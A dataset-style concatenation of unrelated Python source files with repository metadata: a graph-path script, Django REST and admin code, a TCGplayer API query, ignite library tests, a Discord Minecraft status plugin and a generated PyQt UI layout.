Randomly pick a point to start.
If there're still unexplored edges where there's no available way at current node,
We will select a node from the existed path, which still has unexplored edges
Then, start from this point, go through the existed path again, and move on to new edges
'''
# Generate graph dict, calculate total edges, initiate available nodes set
graph, num_edges = input_to_graph(string)
available_nodes = set()
graph_temp = graph
# Randomly pick a node and start
start_point = random.sample(graph_temp, 1) ##### RETURN A LIST!
path = start_point
current = start_point[0]
# Iterate
# 1). No available edges -->finish or startover
# 2). Only one available edge --> go and remove the current node
# 3). More than one available edge --> randomly pick one way and take down this node
while True:
#print graph_temp[current]
if len(graph_temp[current]) == 0:
if num_edges == 0:
break
elif num_edges < 0:
print 'ERROR!'
else:
# print available_nodes
new_start = random.choice(list(available_nodes))
index = path.index(new_start)
path = path[index : -1] + path[0 : index] + [new_start]
current = new_start
# print '--start over-- \n', path
elif len(graph_temp[current]) == 1:
available_nodes.discard(current) ###Remove this node if it is in the set, because there's no more available edges
num_edges -= 1
next = graph_temp[current].pop()
path.append(next)
current = next
# print current, available_nodes
# print 'busy node', path
else:
available_nodes.add(current)
num_edges -= 1
next = graph_temp[current].pop(random.randrange(len(graph_temp[current])))
path.append(next)
current = next
# print available_nodes
# print path
output_path(path)
string = ''' 0 -> 3
1 -> 0
2 -> 1,6
3 -> 2
4 -> 2
5 -> 4
6 -> 5,8
7 -> 9
8 -> 7
9 -> 6'''
eulerian_path(string)
|
[
"engelzora@gmail.com"
] |
engelzora@gmail.com
|
0f18e5511f665676cbc15007b1d148014be778bf
|
d872437facb6242075ee3951044445b29726f7ba
|
/kennywoodapi/views/parkarea.py
|
7210d95ed6b8ff6524631d0b3622cc54b117ffd5
|
[] |
no_license
|
bitomann/kennywood
|
31debe6e7cb139254f3055d645ef512f87983518
|
36ea56e5ecd2fb76564ef6d63b0b02feab7d9123
|
refs/heads/master
| 2023-08-15T09:37:10.552161
| 2020-05-29T18:01:39
| 2020-05-29T18:01:39
| 265,348,840
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,000
|
py
|
"""Park Areas for Kennywood Amusement Park"""
from django.http import HttpResponseServerError
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from rest_framework import serializers
from rest_framework import status
from kennywoodapi.models import ParkArea, Attraction, Itinerary
class ParkAreaSerializer(serializers.HyperlinkedModelSerializer):
"""JSON serializer for park areas
Arguments:
serializers
"""
class Meta:
model = ParkArea
url = serializers.HyperlinkedIdentityField(
view_name='parkarea',
lookup_field='id'
)
fields = ('id', 'url', 'name', 'theme', 'attractions')
depth = 2
class ParkAreas(ViewSet):
"""Park Areas for Kennywood Amusement Park"""
def create(self, request):
"""Handle POST operations
Returns:
Response -- JSON serialized ParkArea instance
"""
newarea = ParkArea()
newarea.name = request.data["name"]
newarea.theme = request.data["theme"]
newarea.save()
serializer = ParkAreaSerializer(newarea, context={'request': request})
return Response(serializer.data)
def retrieve(self, request, pk=None):
"""Handle GET requests for single park area
Returns:
Response -- JSON serialized park area instance
"""
try:
area = ParkArea.objects.get(pk=pk)
serializer = ParkAreaSerializer(area, context={'request': request})
return Response(serializer.data)
except Exception as ex:
return HttpResponseServerError(ex)
def update(self, request, pk=None):
"""Handle PUT requests for a park area
Returns:
Response -- Empty body with 204 status code
"""
area = ParkArea.objects.get(pk=pk)
area.name = request.data["name"]
area.theme = request.data["theme"]
area.save()
return Response({}, status=status.HTTP_204_NO_CONTENT)
def destroy(self, request, pk=None):
"""Handle DELETE requests for a single park area
Returns:
Response -- 200, 404, or 500 status code
"""
try:
area = ParkArea.objects.get(pk=pk)
area.delete()
return Response({}, status=status.HTTP_204_NO_CONTENT)
except ParkArea.DoesNotExist as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)
except Exception as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def list(self, request):
"""Handle GET requests to park areas resource
Returns:
Response -- JSON serialized list of park areas
"""
areas = ParkArea.objects.all()
serializer = ParkAreaSerializer(
areas, many=True, context={'request': request})
return Response(serializer.data)
|
[
"bito@bitomann.com"
] |
bito@bitomann.com
|
547845e3f6dc9b2e66fcb031a7cda1cd2a574533
|
516c8f7454febc3e071cf979a8bbb22148736c3b
|
/testCalls/test_call3.py
|
ac6c87bf814ea6ef3f38636320b75b254110dfc4
|
[] |
no_license
|
aymei2/EdisonProject
|
850f2a52ccced207893d872873cb07a64b6c88cb
|
0bd2dfced65c33b17b0d464bbb33953fd6823bb4
|
refs/heads/master
| 2023-07-06T13:31:47.796399
| 2021-08-14T23:55:15
| 2021-08-14T23:55:15
| 281,704,224
| 1
| 0
| null | 2021-08-14T23:55:16
| 2020-07-22T14:45:44
|
Python
|
UTF-8
|
Python
| false
| false
| 505
|
py
|
import requests
import json
from variables import *
url = "https://api.tcgplayer.com/catalog/products/"
headers = {
'accept': 'application/json',
"Authorization": "bearer " + access_token,
"includeSkus":"true"
}
payload = {
'limit': '100',
"categoryId":"2",
"productName":"Solemn Judgment",
}
response = requests.request("GET", url, headers=headers, params=payload)
json_response = json.loads(response.text)
json_pretty = json.dumps(json_response, indent=2, sort_keys=True)
print(json_pretty)
|
[
"amei@MDEV701.mak.local"
] |
amei@MDEV701.mak.local
|
509ecc5e938c56502addca688cbaf06a2aed2569
|
ae8c50137127eed98e9c879d6fec516d541a3a1c
|
/tests/ignite/contrib/engines/test_common.py
|
5520403c12c59b638fde9a09a59096c9a2fa2bfb
|
[
"BSD-3-Clause"
] |
permissive
|
Bartolo1024/ignite
|
ab348620bae492589b6b80a9b57ea20668a6328f
|
b087fef0bc5f97cda415c1c56f1cd589383c54be
|
refs/heads/master
| 2022-12-04T14:54:42.284440
| 2020-06-05T21:49:39
| 2020-06-05T21:49:39
| 269,961,799
| 0
| 0
|
BSD-3-Clause
| 2020-06-06T11:34:25
| 2020-06-06T11:34:24
| null |
UTF-8
|
Python
| false
| false
| 17,626
|
py
|
import os
from unittest.mock import MagicMock
import pytest
import torch
import torch.nn as nn
from torch.utils.data.distributed import DistributedSampler
import ignite.contrib.handlers as handlers
import ignite.distributed as idist
from ignite.contrib.engines.common import (
_setup_logging,
add_early_stopping_by_val_score,
save_best_model_by_val_score,
setup_any_logging,
setup_common_training_handlers,
setup_mlflow_logging,
setup_neptune_logging,
setup_plx_logging,
setup_tb_logging,
setup_trains_logging,
setup_visdom_logging,
setup_wandb_logging,
)
from ignite.engine import Engine, Events
from ignite.handlers import TerminateOnNan
class DummyModel(nn.Module):
def __init__(self):
super(DummyModel, self).__init__()
self.net = nn.Linear(1, 1)
def forward(self, x):
return self.net(x)
def _test_setup_common_training_handlers(dirname, device, rank=0, local_rank=0, distributed=False, lr_scheduler=None):
lr = 0.01
step_size = 100
gamma = 0.5
num_iters = 100
num_epochs = 10
model = DummyModel().to(device)
if distributed and "cuda" in device:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[local_rank,], output_device=local_rank)
optimizer = torch.optim.SGD(model.parameters(), lr=lr)
if lr_scheduler is None:
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma)
elif isinstance(lr_scheduler, str) and lr_scheduler == "ignite|LRScheduler":
from ignite.contrib.handlers import LRScheduler
lr_scheduler = LRScheduler(torch.optim.lr_scheduler.StepLR(optimizer, step_size=step_size, gamma=gamma))
elif isinstance(lr_scheduler, str) and lr_scheduler == "ignite":
from ignite.contrib.handlers import PiecewiseLinear
milestones_values = [(0, 0.0), (step_size, lr), (num_iters * (num_epochs - 1), 0.0)]
lr_scheduler = PiecewiseLinear(optimizer, param_name="lr", milestones_values=milestones_values)
else:
raise ValueError("Unknown lr_scheduler: {}".format(lr_scheduler))
def update_fn(engine, batch):
if (engine.state.iteration - 1) % 50 == 0:
print("- lr:", optimizer.param_groups[0]["lr"])
optimizer.zero_grad()
x = torch.tensor([batch], requires_grad=True, device=device)
y_pred = model(x)
loss = y_pred.mean()
loss.backward()
optimizer.step()
return loss
train_sampler = None
if distributed and idist.get_world_size() > 1:
train_sampler = MagicMock(spec=DistributedSampler)
train_sampler.set_epoch = MagicMock()
trainer = Engine(update_fn)
setup_common_training_handlers(
trainer,
train_sampler=train_sampler,
to_save={"model": model, "optimizer": optimizer},
save_every_iters=75,
output_path=dirname,
lr_scheduler=lr_scheduler,
with_gpu_stats=False,
output_names=["batch_loss",],
with_pbars=True,
with_pbar_on_iters=True,
log_every_iters=50,
)
data = [i * 0.1 for i in range(num_iters)]
trainer.run(data, max_epochs=num_epochs)
# check handlers
handlers = trainer._event_handlers[Events.ITERATION_COMPLETED]
for cls in [
TerminateOnNan,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
assert "batch_loss" in trainer.state.metrics
# Check saved checkpoint
if rank == 0:
checkpoints = list(os.listdir(dirname))
assert len(checkpoints) == 1
for v in [
"training_checkpoint",
]:
assert any([v in c for c in checkpoints])
# Check LR scheduling
assert optimizer.param_groups[0]["lr"] <= lr * gamma ** (num_iters * num_epochs / step_size), "{} vs {}".format(
optimizer.param_groups[0]["lr"], lr * gamma ** (num_iters * num_epochs / step_size)
)
def test_asserts_setup_common_training_handlers():
trainer = Engine(lambda e, b: None)
with pytest.raises(
ValueError, match=r"If to_save argument is provided then output_path argument should be also defined"
):
setup_common_training_handlers(trainer, to_save={})
with pytest.warns(UserWarning, match=r"Argument train_sampler is a distributed sampler"):
train_sampler = MagicMock(spec=DistributedSampler)
setup_common_training_handlers(trainer, train_sampler=train_sampler)
with pytest.warns(UserWarning, match=r"Argument device is unused and deprecated"):
setup_common_training_handlers(trainer, device="cpu")
def test_no_warning_with_train_sampler(recwarn):
from torch.utils.data import RandomSampler
trainer = Engine(lambda e, b: None)
train_sampler = RandomSampler([0, 1, 2])
setup_common_training_handlers(trainer, train_sampler=train_sampler)
assert len(recwarn) == 0, recwarn.pop()
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" not in os.environ, reason="Should have more than 1 worker")
def test_assert_setup_common_training_handlers_wrong_train_sampler(distributed_context_single_node_gloo):
trainer = Engine(lambda e, b: None)
from torch.utils.data.sampler import RandomSampler
with pytest.raises(TypeError, match=r"Train sampler should be torch DistributedSampler"):
train_sampler = RandomSampler([0, 1, 2, 3])
setup_common_training_handlers(trainer, train_sampler)
def test_setup_common_training_handlers(dirname, capsys):
_test_setup_common_training_handlers(dirname, device="cpu")
# Check epoch-wise pbar
captured = capsys.readouterr()
out = captured.err.split("\r")
out = list(map(lambda x: x.strip(), out))
out = list(filter(None, out))
assert "Epoch:" in out[-1], "{}".format(out[-1])
def test_save_best_model_by_val_score(dirname, capsys):
trainer = Engine(lambda e, b: None)
evaluator = Engine(lambda e, b: None)
model = DummyModel()
acc_scores = [0.1, 0.2, 0.3, 0.4, 0.3, 0.5, 0.6, 0.61, 0.7, 0.5]
@trainer.on(Events.EPOCH_COMPLETED)
def validate(engine):
evaluator.run(
[0,]
)
@evaluator.on(Events.EPOCH_COMPLETED)
def set_eval_metric(engine):
engine.state.metrics = {"acc": acc_scores[trainer.state.epoch - 1]}
save_best_model_by_val_score(dirname, evaluator, model, metric_name="acc", n_saved=2, trainer=trainer)
data = [
0,
]
trainer.run(data, max_epochs=len(acc_scores))
assert set(os.listdir(dirname)) == set(["best_model_8_val_acc=0.6100.pt", "best_model_9_val_acc=0.7000.pt"])
def test_add_early_stopping_by_val_score():
trainer = Engine(lambda e, b: None)
evaluator = Engine(lambda e, b: None)
acc_scores = [0.1, 0.2, 0.3, 0.4, 0.3, 0.3, 0.2, 0.1, 0.1, 0.0]
@trainer.on(Events.EPOCH_COMPLETED)
def validate(engine):
evaluator.run(
[0,]
)
@evaluator.on(Events.EPOCH_COMPLETED)
def set_eval_metric(engine):
engine.state.metrics = {"acc": acc_scores[trainer.state.epoch - 1]}
add_early_stopping_by_val_score(patience=3, evaluator=evaluator, trainer=trainer, metric_name="acc")
data = [
0,
]
state = trainer.run(data, max_epochs=len(acc_scores))
assert state.epoch == 7
def test_deprecated_setup_any_logging():
with pytest.raises(DeprecationWarning, match=r"is deprecated since 0\.4\.0\."):
setup_any_logging(None, None, None, None, None, None)
def test__setup_logging_wrong_args():
with pytest.raises(TypeError, match=r"Argument optimizers should be either a single optimizer or"):
_setup_logging(MagicMock(), MagicMock(), "abc", MagicMock(), 1)
with pytest.raises(TypeError, match=r"Argument evaluators should be either a single engine or"):
_setup_logging(MagicMock(), MagicMock(), MagicMock(spec=torch.optim.SGD), "abc", 1)
def _test_setup_logging(
setup_logging_fn,
kwargs_dict,
output_handler_cls,
opt_params_handler_cls,
with_eval=True,
with_optim=True,
as_class=False,
log_every_iters=1,
):
trainer = Engine(lambda e, b: b)
evaluators = None
optimizers = None
if with_eval:
evaluator = Engine(lambda e, b: None)
acc_scores = [0.1, 0.2, 0.3, 0.4, 0.3, 0.3, 0.2, 0.1, 0.1, 0.0]
@trainer.on(Events.EPOCH_COMPLETED)
def validate(engine):
evaluator.run(
[0,]
)
@evaluator.on(Events.EPOCH_COMPLETED)
def set_eval_metric(engine):
engine.state.metrics = {"acc": acc_scores[trainer.state.epoch - 1]}
evaluators = {"validation": evaluator}
if as_class:
evaluators = evaluators["validation"]
if with_optim:
t = torch.tensor([0,])
optimizers = {"optimizer": torch.optim.SGD([t,], lr=0.01)}
if as_class:
optimizers = optimizers["optimizer"]
kwargs_dict["trainer"] = trainer
kwargs_dict["optimizers"] = optimizers
kwargs_dict["evaluators"] = evaluators
kwargs_dict["log_every_iters"] = log_every_iters
x_logger = setup_logging_fn(**kwargs_dict)
handlers = trainer._event_handlers[Events.ITERATION_COMPLETED]
for cls in [
output_handler_cls,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
if with_optim:
handlers = trainer._event_handlers[Events.ITERATION_STARTED]
for cls in [
opt_params_handler_cls,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
if with_eval:
handlers = evaluator._event_handlers[Events.COMPLETED]
for cls in [
output_handler_cls,
]:
assert any([isinstance(h[0], cls) for h in handlers]), "{}".format(handlers)
data = [0, 1, 2]
trainer.run(data, max_epochs=10)
if "output_path" in kwargs_dict:
tb_files = list(os.listdir(kwargs_dict["output_path"]))
assert len(tb_files) == 1
for v in [
"events",
]:
assert any([v in c for c in tb_files]), "{}".format(tb_files)
return x_logger
def test_setup_tb_logging(dirname):
tb_logger = _test_setup_logging(
setup_logging_fn=setup_tb_logging,
kwargs_dict={"output_path": os.path.join(dirname, "t1")},
output_handler_cls=handlers.tensorboard_logger.OutputHandler,
opt_params_handler_cls=handlers.tensorboard_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
tb_logger.close()
tb_logger = _test_setup_logging(
setup_logging_fn=setup_tb_logging,
kwargs_dict={"output_path": os.path.join(dirname, "t2")},
output_handler_cls=handlers.tensorboard_logger.OutputHandler,
opt_params_handler_cls=handlers.tensorboard_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
tb_logger.close()
tb_logger = _test_setup_logging(
setup_logging_fn=setup_tb_logging,
kwargs_dict={"output_path": os.path.join(dirname, "t2")},
output_handler_cls=handlers.tensorboard_logger.OutputHandler,
opt_params_handler_cls=handlers.tensorboard_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
as_class=True,
log_every_iters=None,
)
tb_logger.close()
def test_setup_visdom_logging(visdom_server):
vis_logger = _test_setup_logging(
setup_logging_fn=setup_visdom_logging,
kwargs_dict={"server": visdom_server[0], "port": str(visdom_server[1])},
output_handler_cls=handlers.visdom_logger.OutputHandler,
opt_params_handler_cls=handlers.visdom_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
vis_logger.close()
vis_logger = _test_setup_logging(
setup_logging_fn=setup_visdom_logging,
kwargs_dict={"server": visdom_server[0], "port": str(visdom_server[1])},
output_handler_cls=handlers.visdom_logger.OutputHandler,
opt_params_handler_cls=handlers.visdom_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
vis_logger.close()
def test_setup_plx_logging():
os.environ["POLYAXON_NO_OP"] = "1"
_test_setup_logging(
setup_logging_fn=setup_plx_logging,
kwargs_dict={},
output_handler_cls=handlers.polyaxon_logger.OutputHandler,
opt_params_handler_cls=handlers.polyaxon_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
_test_setup_logging(
setup_logging_fn=setup_plx_logging,
kwargs_dict={},
output_handler_cls=handlers.polyaxon_logger.OutputHandler,
opt_params_handler_cls=handlers.polyaxon_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
def test_setup_mlflow_logging(dirname):
mlf_logger = _test_setup_logging(
setup_logging_fn=setup_mlflow_logging,
kwargs_dict={"tracking_uri": os.path.join(dirname, "p1")},
output_handler_cls=handlers.mlflow_logger.OutputHandler,
opt_params_handler_cls=handlers.mlflow_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
mlf_logger.close()
mlf_logger = _test_setup_logging(
setup_logging_fn=setup_mlflow_logging,
kwargs_dict={"tracking_uri": os.path.join(dirname, "p2")},
output_handler_cls=handlers.mlflow_logger.OutputHandler,
opt_params_handler_cls=handlers.mlflow_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
mlf_logger.close()
def test_setup_wandb_logging(dirname):
from unittest.mock import patch
with patch("ignite.contrib.engines.common.WandBLogger") as _:
setup_wandb_logging(MagicMock())
def test_setup_trains_logging():
handlers.trains_logger.TrainsLogger.set_bypass_mode(True)
with pytest.warns(UserWarning, match=r"running in bypass mode"):
trains_logger = _test_setup_logging(
setup_logging_fn=setup_trains_logging,
kwargs_dict={},
output_handler_cls=handlers.trains_logger.OutputHandler,
opt_params_handler_cls=handlers.trains_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
trains_logger.close()
trains_logger = _test_setup_logging(
setup_logging_fn=setup_trains_logging,
kwargs_dict={},
output_handler_cls=handlers.trains_logger.OutputHandler,
opt_params_handler_cls=handlers.trains_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
trains_logger.close()
def test_setup_neptune_logging(dirname):
npt_logger = _test_setup_logging(
setup_logging_fn=setup_neptune_logging,
kwargs_dict={"offline_mode": True},
output_handler_cls=handlers.neptune_logger.OutputHandler,
opt_params_handler_cls=handlers.neptune_logger.OptimizerParamsHandler,
with_eval=False,
with_optim=False,
)
npt_logger.close()
npt_logger = _test_setup_logging(
setup_logging_fn=setup_neptune_logging,
kwargs_dict={"offline_mode": True},
output_handler_cls=handlers.neptune_logger.OutputHandler,
opt_params_handler_cls=handlers.neptune_logger.OptimizerParamsHandler,
with_eval=True,
with_optim=True,
)
npt_logger.close()
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_distrib_gpu(dirname, distributed_context_single_node_nccl):
local_rank = distributed_context_single_node_nccl["local_rank"]
device = "cuda:{}".format(local_rank)
_test_setup_common_training_handlers(dirname, device, rank=local_rank, local_rank=local_rank, distributed=True)
test_add_early_stopping_by_val_score()
@pytest.mark.distributed
def test_distrib_cpu(dirname, distributed_context_single_node_gloo):
device = "cpu"
local_rank = distributed_context_single_node_gloo["local_rank"]
_test_setup_common_training_handlers(dirname, device, rank=local_rank, local_rank=local_rank, distributed=True)
_test_setup_common_training_handlers(
dirname, device, rank=local_rank, local_rank=local_rank, distributed=True, lr_scheduler="ignite|LRScheduler"
)
_test_setup_common_training_handlers(
dirname, device, rank=local_rank, local_rank=local_rank, distributed=True, lr_scheduler="ignite"
)
test_add_early_stopping_by_val_score()
@pytest.mark.multinode_distributed
@pytest.mark.skipif("MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_cpu(dirname, distributed_context_multi_node_gloo):
device = "cpu"
rank = distributed_context_multi_node_gloo["rank"]
_test_setup_common_training_handlers(dirname, device, rank=rank)
test_add_early_stopping_by_val_score()
@pytest.mark.multinode_distributed
@pytest.mark.skipif("GPU_MULTINODE_DISTRIB" not in os.environ, reason="Skip if not multi-node distributed")
def test_multinode_distrib_gpu(dirname, distributed_context_multi_node_nccl):
local_rank = distributed_context_multi_node_nccl["local_rank"]
rank = distributed_context_multi_node_nccl["rank"]
device = "cuda:{}".format(local_rank)
_test_setup_common_training_handlers(dirname, device, rank=rank, local_rank=local_rank, distributed=True)
test_add_early_stopping_by_val_score()
|
[
"noreply@github.com"
] |
Bartolo1024.noreply@github.com
|
34f06475f2b005309de47f1a4dc9f063126748dc
|
d35fb547eb4d04be5ac06fd4e39bd11a6e7e2b39
|
/test_project/core/admin.py
|
8378e277899f8e598f8d2c40a63aee17b488b025
|
[
"MIT"
] |
permissive
|
youzerssif/djangoql
|
c2adea5414e57757ba630f4e0ee6cf5e6f08bcae
|
29b9379e181318cea60a31b679b8601bd5bd9404
|
refs/heads/master
| 2021-04-01T15:22:11.554094
| 2020-03-15T21:33:34
| 2020-03-15T21:33:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,721
|
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.models import User, Group
from django.db.models import Q, Count
from django.utils.timezone import now
from djangoql.admin import DjangoQLSearchMixin
from djangoql.schema import DjangoQLSchema, IntField
from .models import Book
admin.site.unregister(User)
class BookQLSchema(DjangoQLSchema):
suggest_options = {
Book: ['genre'],
}
@admin.register(Book)
class BookAdmin(DjangoQLSearchMixin, admin.ModelAdmin):
djangoql_schema = BookQLSchema
list_display = ('name', 'author', 'genre', 'written', 'is_published')
list_filter = ('is_published',)
filter_horizontal = ('similar_books',)
class UserAgeField(IntField):
"""
Search by given number of full years
"""
model = User
name = 'age'
def get_lookup_name(self):
"""
We'll be doing comparisons vs. this model field
"""
return 'date_joined'
def get_lookup(self, path, operator, value):
if operator == 'in':
result = None
for year in value:
condition = self.get_lookup(path, '=', year)
result = condition if result is None else result | condition
return result
elif operator == 'not in':
result = None
for year in value:
condition = self.get_lookup(path, '!=', year)
result = condition if result is None else result & condition
return result
value = self.get_lookup_value(value)
search_field = '__'.join(path + [self.get_lookup_name()])
year_start = self.years_ago(value + 1)
year_end = self.years_ago(value)
if operator == '=':
return (
Q(**{'%s__gt' % search_field: year_start}) &
Q(**{'%s__lte' % search_field: year_end})
)
elif operator == '!=':
return (
Q(**{'%s__lte' % search_field: year_start}) |
Q(**{'%s__gt' % search_field: year_end})
)
elif operator == '>':
return Q(**{'%s__lt' % search_field: year_start})
elif operator == '>=':
return Q(**{'%s__lt' % search_field: year_end})
elif operator == '<':
return Q(**{'%s__gt' % search_field: year_end})
elif operator == '<=':
return Q(**{'%s__gte' % search_field: year_start})
def years_ago(self, n):
timestamp = now()
try:
return timestamp.replace(year=timestamp.year - n)
except ValueError:
# February 29
return timestamp.replace(month=2, day=28, year=timestamp.year - n)
class UserQLSchema(DjangoQLSchema):
suggest_options = {
Book: ['genre'],
Group: ['name'],
}
def get_fields(self, model):
fields = super(UserQLSchema, self).get_fields(model)
if model == User:
fields += [UserAgeField(), IntField(name='groups_count')]
return fields
@admin.register(User)
class CustomUserAdmin(DjangoQLSearchMixin, UserAdmin):
djangoql_schema = UserQLSchema
djangoql_completion_enabled_by_default = False
search_fields = ('username', 'first_name', 'last_name')
list_display = ('username', 'first_name', 'last_name', 'is_staff', 'group')
def group(self, obj):
return ', '.join([g.name for g in obj.groups.all()])
group.short_description = 'Groups'
def get_queryset(self, request):
qs = super(CustomUserAdmin, self).get_queryset(request)
return qs.\
annotate(groups_count=Count('groups')).\
prefetch_related('groups')
|
[
"denis.stebunov@ivelum.com"
] |
denis.stebunov@ivelum.com
|
359c9319e5e7f599aece5c1091a11430ff15a4b8
|
45304b35e2793d7892a14f9416c76cfdd922db94
|
/bot/plugins/minecraft.py
|
b55d8348194a5a5d843c5a7a4ab59d19d473cff9
|
[] |
no_license
|
b1naryth1ef/b1nb0t
|
3f890d1ea5b863e6e708cb1599d0d81ff95b2bfb
|
10bab420ecf58b7aa918ee7060885503e2cad3e7
|
refs/heads/master
| 2021-01-20T00:20:58.104035
| 2019-06-24T15:26:50
| 2019-06-24T15:26:50
| 89,116,574
| 10
| 6
| null | 2017-07-14T00:08:25
| 2017-04-23T04:13:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,817
|
py
|
from mcipc.rcon import Client
from disco.bot import Plugin, Config
from disco.types.message import MessageEmbed
JOIN_COLOR = 0x77dd77
LEAVE_COLOR = 0xff6961
class MinecraftPluginConfig(Config):
ip = ''
port = 0
password = ''
channel_id = ''
@Plugin.with_config(MinecraftPluginConfig)
class MinecraftPlugin(Plugin):
def load(self, data):
super().load(data)
self._online = None
@Plugin.schedule(20, init=True)
def on_schedule(self):
self.state.ready.wait()
players = self.get_players()
if not players:
return
channel = self.state.channels.get(self.config.channel_id)
if not channel:
print('failed to find channel')
return
names = set(players.names)
if self._online is not None and names != self._online:
connected = names - self._online
for conn in connected:
embed = MessageEmbed()
embed.color = JOIN_COLOR
embed.title = '{} joined the server'.format(conn)
channel.send_message(embed=embed)
disconnected = self._online - names
for conn in disconnected:
embed = MessageEmbed()
embed.color = LEAVE_COLOR
embed.title = '{} left the server'.format(conn)
channel.send_message(embed=embed)
if self._online is None:
print('Initial Online: {}'.format(names))
self._online = names
def get_players(self):
try:
with Client(self.config.ip, self.config.port) as client:
client.login(self.config.password)
return client.players
except Exception:
self.log.exception('Failed to query minecraft RCON: ')
|
[
"b1naryth1ef@gmail.com"
] |
b1naryth1ef@gmail.com
|
fc8f274d6751296228bfbc0464614b4792647541
|
a892e0b3036e940e4a6605567e8e1b00ebb22f59
|
/FALLOW/gui/uis/input_maps/MapInputUI.py
|
efefb6f639d3964c16046f996e460ed8044dae8d
|
[] |
no_license
|
uttu90/NewFALLOW
|
9e03ddee089b288bd31497c5ff584635889eef69
|
ef7a32edae96bbc268c6db91ad548be980348198
|
refs/heads/master
| 2021-01-11T22:02:04.805243
| 2018-08-11T08:38:01
| 2018-08-11T08:38:01
| 78,899,955
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,972
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MapInputUI.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1551, 982)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_2.setObjectName("gridLayout_2")
self.MapInputWidget = QtWidgets.QWidget(self.centralwidget)
self.MapInputWidget.setEnabled(True)
self.MapInputWidget.setMinimumSize(QtCore.QSize(500, 500))
self.MapInputWidget.setMouseTracking(True)
self.MapInputWidget.setFocusPolicy(QtCore.Qt.ClickFocus)
self.MapInputWidget.setAcceptDrops(True)
self.MapInputWidget.setInputMethodHints(QtCore.Qt.ImhNone)
self.MapInputWidget.setObjectName("MapInputWidget")
self.gridLayout_2.addWidget(self.MapInputWidget, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.toolBar = QtWidgets.QToolBar(MainWindow)
self.toolBar.setObjectName("toolBar")
MainWindow.addToolBar(QtCore.Qt.TopToolBarArea, self.toolBar)
self.dockWidget = QtWidgets.QDockWidget(MainWindow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.dockWidget.sizePolicy().hasHeightForWidth())
self.dockWidget.setSizePolicy(sizePolicy)
self.dockWidget.setMinimumSize(QtCore.QSize(386, 260))
self.dockWidget.setFeatures(QtWidgets.QDockWidget.NoDockWidgetFeatures)
self.dockWidget.setObjectName("dockWidget")
self.dockWidgetContents = QtWidgets.QWidget()
self.dockWidgetContents.setObjectName("dockWidgetContents")
self.gridLayout = QtWidgets.QGridLayout(self.dockWidgetContents)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.label = QtWidgets.QLabel(self.dockWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.horizontalLayout.addWidget(self.label)
self.inputPixelSize = QtWidgets.QLineEdit(self.dockWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.inputPixelSize.sizePolicy().hasHeightForWidth())
self.inputPixelSize.setSizePolicy(sizePolicy)
self.inputPixelSize.setMinimumSize(QtCore.QSize(30, 20))
self.inputPixelSize.setMaximumSize(QtCore.QSize(30, 20))
self.inputPixelSize.setObjectName("inputPixelSize")
self.horizontalLayout.addWidget(self.inputPixelSize)
spacerItem = QtWidgets.QSpacerItem(100, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
